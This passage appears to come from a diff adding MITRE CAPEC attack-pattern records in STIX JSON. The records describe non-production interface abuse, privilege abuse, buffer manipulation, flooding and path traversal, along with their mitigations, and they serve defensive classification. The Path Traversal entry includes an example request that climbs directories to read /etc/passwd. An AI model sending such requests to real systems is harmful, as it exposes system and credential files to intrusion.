"external_id": "CWE-1294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1294.html" + }, + { + "external_id": "CWE-1295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1295.html" + }, + { + "external_id": "CWE-1296", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1296.html" + 
}, + { + "external_id": "CWE-1302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1302.html" + }, + { + "external_id": "CWE-1313", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1313.html" + }, + { + "description": "Swarup Bhunia, Mark M. Tehranipoor, The Hardware Trojan War: Attacks, Myths, and Defenses, 2017--11---30, Springer", + "external_id": "REF-588", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Boyang Du, Matteo Sonza Reorda, Luca Sterpone, Luis Parra, Marta Portela-Garcia, Almudena Lindoso, Luis Entrena, Exploiting the debug interface to support on-line test of control flow errors, 2013--07---08, Institute of Electrical and Electronics Engineers (IEEE)", + "external_id": "REF-589", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/document/6604058/authors#authors" + } + ], + "id": "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Exploit Non-Production Interfaces", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_consequences": { + "Access_Control": [ + "Modify Data", + "Alter Execution Logic" + ], + "Authentication": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Read Data", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data", + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data", + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Some software applications include application programming interfaces (APIs) that are intended to allow an administrator to test 
and refine their domain. These APIs are typically disabled once a system enters a production environment, but may be left in an insecure state due to a configuration error or mismanagement.\n ", + "\n Many hardware systems leverage bits typically reserved for future functionality for testing and debugging purposes. If these reserved bits remain enabled in a production environment, it could allow an adversary to induce unwanted/unsupported behavior in the hardware.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Vulnerable Interface: An adversary explores a target system for sample or test interfaces that have not been disabled by a system administrator and which may be exploitable by the adversary.

  2. Techniques
    If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Exploit

  1. Leverage Test Interface to Execute Attacks: Once an adversary has discovered a system with a non-production interface, the interface is leveraged to exploit the system and/or conduct various attacks.

  2. Techniques
    The adversary can leverage the sample or test interface to conduct several types of attacks such as Adversary-in-the-Middle attacks (CAPEC-94), keylogging, Cross Site Scripting (XSS), hardware manipulation attacks, and more.
", + "x_capec_extended_description": "\n Non-production interfaces are insecure by default and should not be resident on production systems, since they may reveal sensitive information or functionality that should not be known to end-users. However, such interfaces may be unintentionally left enabled on a production system due to configuration errors, supply chain mismanagement, or other pre-deployment activities.\n Ultimately, failure to properly disable non-production interfaces, in a production environment, may expose a great deal of diagnostic information or functionality to an adversary, which can be utilized to further refine their attack. Moreover, many non-production interfaces do not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may contain many flaws and vulnerabilities that could allow an adversary to severely disrupt a target.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_prerequisites": [ + "The target must have configured non-production interfaces and failed to secure or remove them when brought into a production environment." + ], + "x_capec_resources_required": [ + "For some interfaces, the adversary will need that appropriate client application or hardware that interfaces with the interface. Other non-production interfaces can be executed using simple tools, such as web browsers or console windows. In some cases, an adversary may need to be able to authenticate to the target before it can access the vulnerable interface." + ], + "x_capec_skills_required": { + "High": "Exploiting non-production interfaces requires significant skill and knowledge about the potential non-production interfaces left enabled in production." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that production systems do not contain non-production interfaces and that these interfaces are only used in development environments.", + "id": "course-of-action--36f8b35a-423d-47cf-85a2-766434c723ab", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-121-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--faafe0e8-4e6c-4405-a59d-22f1ce919834", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36f8b35a-423d-47cf-85a2-766434c723ab", + "spec_version": "2.1", + "target_ref": "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. 
Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.", + "external_references": [ + { + "external_id": "CAPEC-122", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1317", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1317.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Privilege Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. 
Thus compromising data integrity and confidentiality in addition to HIPAA violations.\n " + ], + "x_capec_extended_description": "\n If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.\n This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac", + "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7" + ], + "x_capec_prerequisites": [ + "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.", + "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The ability to access the target is required." 
+ ], + "x_capec_skills_required": { + "Low": "Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts.", + "id": "course-of-action--556e719c-c102-427d-b5b4-11a4dab62f8e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-122-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--957019cc-30e1-4d46-9ee9-1b20f9b69653", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--556e719c-c102-427d-b5b4-11a4dab62f8e", + "spec_version": "2.1", + "target_ref": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. 
In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.", + "external_references": [ + { + "external_id": "CAPEC-123", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/123.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + } + ], + "id": "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Buffer Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A buffer manipulation attack often results in a crash of the application due to the corruption of memory.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Modify Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Read Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--40eddae8-4d7d-4fc3-b220-1c9706f01a96" + ], + "x_capec_prerequisites": [ + "The adversary must identify a programmatic means for interacting with a buffer, such as 
vulnerable C code, and be able to provide input to this interaction." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. 
Finally, there may be operating system level preventative functionality that can be applied.", + "id": "course-of-action--69611262-87d4-4bba-8db4-068c40577c4c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-123-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2e47286-34b7-484e-a95b-67f1b21ae24b", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69611262-87d4-4bba-8db4-068c40577c4c", + "spec_version": "2.1", + "target_ref": "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. 
This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications.", + "external_references": [ + { + "external_id": "CAPEC-124", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/124.html" + }, + { + "external_id": "CWE-1189", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1189.html" + }, + { + "external_id": "CWE-1331", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1331.html" + } + ], + "id": "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Shared Resource Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "The target applications, threads or functions must share resources between themselves.", + "The adversary must be able to manipulate some piece of the shared resource either directly or indirectly and the other users of the data must accept the changed data as valid. Usually this requires that the adversary be able to compromise one of the sharing applications or threads in order to manipulate the shared data." + ], + "x_capec_resources_required": [ + "None: The attacker does not need any specialized resources to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. 
This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.", + "external_references": [ + { + "external_id": "CAPEC-125", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/125.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + }, + { + "description": "Traffic flood", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Traffic_flood" + } + ], + "id": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Flooding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { 
+ "Availability": [ + "Unreliable Execution (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90" + ], + "x_capec_prerequisites": [ + "Any target that services requests is vulnerable to this attack on some level of scale." + ], + "x_capec_resources_required": [ + "A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protocols have specific limits of scale configured.", + "id": "course-of-action--55bca578-149c-4129-a003-3c2d5bd54b5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22178117-f064-4303-8985-7fd9ee2fe9d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55bca578-149c-4129-a003-3c2d5bd54b5b", + "spec_version": "2.1", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.", + "id": "course-of-action--c8dd811c-2eb5-418e-aeda-80170abad702", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0a57d15-98a3-44ab-9dee-7451762bc00b", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c8dd811c-2eb5-418e-aeda-80170abad702", + "spec_version": "2.1", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "id": "course-of-action--6c5ef0e0-77e5-40d3-85bf-7c50693c211d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22e10e44-9d16-4de8-9376-289ccde29247", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c5ef0e0-77e5-40d3-85bf-7c50693c211d", + "spec_version": "2.1", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. 
A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "external_id": "CAPEC-126", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "description": "Path Traversal", + "external_id": "33", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Path-Traversal" + }, + { + "description": "Path Traversal", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Path_Traversal" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. 
This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62" + ], + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Configure the access control correctly.", + "id": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--990d82cc-54c9-4536-8db1-9e1e4d3c1162", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Enforce principle of least privilege.", + "id": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fc0b9ea2-577b-4cae-a52b-606ae9ea8f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. 
